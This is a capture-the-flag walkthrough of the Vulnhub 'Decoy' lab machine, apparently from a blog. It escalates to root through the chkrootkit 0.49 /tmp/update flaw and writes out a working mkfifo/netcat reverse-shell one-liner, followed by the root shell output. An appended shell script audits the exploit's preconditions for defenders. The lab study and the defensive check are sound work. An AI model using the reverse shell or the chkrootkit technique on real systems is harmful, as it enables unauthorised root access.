Vulnhub Decoy Target Machine: Detailed Privilege Escalation Supplement

Date: 2023-05-30 11:23:54
Vulnhub Decoy privilege escalation supplement

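After obtaining the password server for user 296640a3b825115a47b68fc44501c828, open two shells at the same time so the behaviour is easier to observe. Each login needs -t "bash --noprofile" to escape the restricted shell. Once logged in, change the PATH environment variable so that it contains the normal directories: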

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat SV-502/logs/log.txt 

The log file contains entries about chkrootkit, a tool that checks whether a system has been backdoored.

In the first shell on the target host, run:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+ 23309  0.0  0.0   6076   828 pts/1    S+   22:49   0:00 grep chk

The output shows that no chkrootkit process is running.

In the second shell, run:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------

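Option 5 is the virus scan, which may be related to chkrootkit: choosing option 5 may be what starts chkrootkit.

After choosing option 5, go back to the first shell and check the processes:

chkrootkit still does not appear.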

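At this point, refer to the exploit-db entry on exploiting version 0.49: create a file named update in /tmp (its content can be anything for now) and give it execute permission: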

Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Then run honeypot.decoy.

Now go back to the first shell and check the processes (this takes a little while):

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+   560  0.0  0.0   6076   884 pts/1    S+   22:59   0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+   562  0.0  0.0   6076   820 pts/1    S+   23:00   0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
root       571  2.0  0.1   2676  1936 ?        S    23:00   0:00 /bin/sh /root/chkrootkit-0.49/chkrootkit

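The ps output now shows a chkrootkit process. So far the update file we created only contains a meaningless string; the next step is to change the content of update to a reverse shell command: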

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.230 5555 >/tmp/f' >/tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ chmod 777 /tmp/update

Then run ./honeypot.decoy again and choose option 5, the virus scan:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Decoy]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.109] 48104
/bin/sh: 0: can't access tty; job control turned off
# cd /root
# ls -alh
total 3.1M
drwx------  4 root                             root                             4.0K Jul  7  2020 .
drwxr-xr-x 18 root                             root                             4.0K Jun 27  2020 ..
lrwxrwxrwx  1 root                             root                                9 Jul  7  2020 .bash_history -> /dev/null
-rw-r--r--  1 root                             root                              570 Jan 31  2010 .bashrc
drwxr-xr-x  2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 30  2009 chkrootkit-0.49
-rw-r--r--  1 root                             root                              39K Apr  9  2015 chkrootkit-0.49.tar.gz
drwxr-xr-x  3 root                             root                             4.0K Jun 27  2020 .local
-rw-r--r--  1 root                             root                             7.7K Jun 27  2020 log.txt
-rw-r--r--  1 root                             root                              148 Aug 17  2015 .profile
-rwxr-xr-x  1 root                             root                             3.0M Aug 22  2019 pspy
-rw-r--r--  1 root                             root                              924 Jul  7  2020 root.txt
-rw-r--r--  1 root                             root                              137 Jul  7  2020 script.sh
-rw-r--r--  1 root                             root                               66 Jul  7  2020 .selected_editor
-rw-r--r--  1 root                             root                              208 Jun 27  2020 .wget-hsts
# cat root.txt
  ........::::::::::::..           .......|...............::::::::........
     .:::::;;;;;;;;;;;:::::.... .     \   | ../....::::;;;;:::::.......
         .       ...........   / \\_   \  |  /     ......  .     ........./\
...:::../\\_  ......     ..._/'   \\\_  \###/   /\_    .../ \_.......   _//
.::::./   \\\ _   .../\    /'      \\\\#######//   \/\   //   \_   ....////
    _/      \\\\   _/ \\\ /  x       \\\\###////      \////     \__  _/////
  ./   x       \\\/     \/ x X           \//////                   \/////
 /     XxX     \\/         XxX X                                    ////   x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
       X        _X      *    X      **         **             x   **    *  X
      _X                    _X           x                *          x     X_


1c203242ab4b4509233ca210d50d2cc5

Thanks for playing! - Felipe Winsnes (@whitecr0wz)
# 
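
A defender-side check for the two preconditions quoted above from the exploit-db reproduction steps (an executable, non-root-owned /tmp/update, and a /tmp that is not mounted noexec). This is an added example, not part of the original post; the function names, return codes and parameters are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audits the preconditions listed in the quoted reproduction steps.
# File path, mounts table and trusted uid are parameters so the checks can be
# exercised against constructed input as well as the live system.

# Succeeds if mount point $2 (default /tmp) carries noexec in mounts table $1.
# If /tmp is not a separate mount, the options of "/" apply to it.
tmp_is_noexec() {
    awk -v mp="${2:-/tmp}" '
        $2 == mp  { exact = $4 }   # a later entry for the same mount point wins
        $2 == "/" { root = $4 }
        END {
            n = split((exact != "" ? exact : root), o, ",")
            for (i = 1; i <= n; i++) if (o[i] == "noexec") exit 0
            exit 1
        }' "${1:-/proc/mounts}"
}

# Succeeds if $1 exists with any execute bit set and its owner is not uid $2.
risky_update_file() {
    [ -f "${1:-/tmp/update}" ] || return 1
    ls -lnd -- "${1:-/tmp/update}" | {
        read -r perms _links uid _rest
        case $perms in
            *[xst]*) [ "$uid" != "${2:-0}" ] ;;   # x, or s/t which imply x
            *)       false ;;
        esac
    }
}

# Returns 0 (not exposed), 1 (exposed, nothing planted) or 2 (planted file found).
audit_chkrootkit_tmp() {
    a_file=${1:-/tmp/update}; a_mounts=${2:-/proc/mounts}; a_uid=${3:-0}
    if tmp_is_noexec "$a_mounts" /tmp; then
        echo "OK: /tmp is mounted noexec"; return 0
    fi
    if risky_update_file "$a_file" "$a_uid"; then
        echo "ALERT: $a_file is executable and not owned by uid $a_uid"; return 2
    fi
    echo "WARN: /tmp allows execution; no untrusted executable at $a_file"
    return 1
}

# Run the audit only when asked, so the functions can also be sourced.
if [ "${1:-}" = "--run" ]; then audit_chkrootkit_tmp; exit $?; fi
```

On this machine the root-run scan is started from the HPAM menu, so return code 2 just before a scan means the file would be executed as root.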

From: https://www.cnblogs.com/jason-huawen/p/17442706.html
